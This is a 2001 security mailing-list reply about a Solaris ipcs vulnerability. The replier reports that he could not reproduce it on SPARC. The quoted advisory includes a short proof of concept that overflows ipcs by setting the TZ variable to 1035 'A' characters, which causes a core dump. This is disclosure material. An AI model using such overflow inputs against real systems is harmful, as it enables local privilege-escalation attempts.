Re: Solaris ipcs vulnerability

From: Mike Batchelor (mikebatat_private)
Date: Mon Apr 16 2001 - 07:22:15 PDT


    Failed to reproduce this problem on Solaris 2.6 and 8 for SPARC.  Ipcs
    behaved normally, except for printing out the long string of "A"'s in the
    output header where the timezone would appear.
    
    > Solaris ipcs vulnerability
    >
    > Release Date:
    > April 11, 2001
    >
    > Systems Affected:
    > Solaris 7 (x86)
    > Other versions of Solaris are most likely affected also.
    >
    > Discovered by:
    > Riley Hassell rileyat_private
    >
    > bash-2.03$ TZ=`perl -e 'print "A"x1035'`
    > bash-2.03$ /usr/bin/i86/ipcs
    > IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
    > Message Queue facility inactive.
    > T ID KEY MODE OWNER GROUP
    > Shared Memory:
    > m 0 0x500004d3 --rw-r--r-- root root
    > Semaphore facility inactive.
    > Segmentation Fault (core dumped)
    


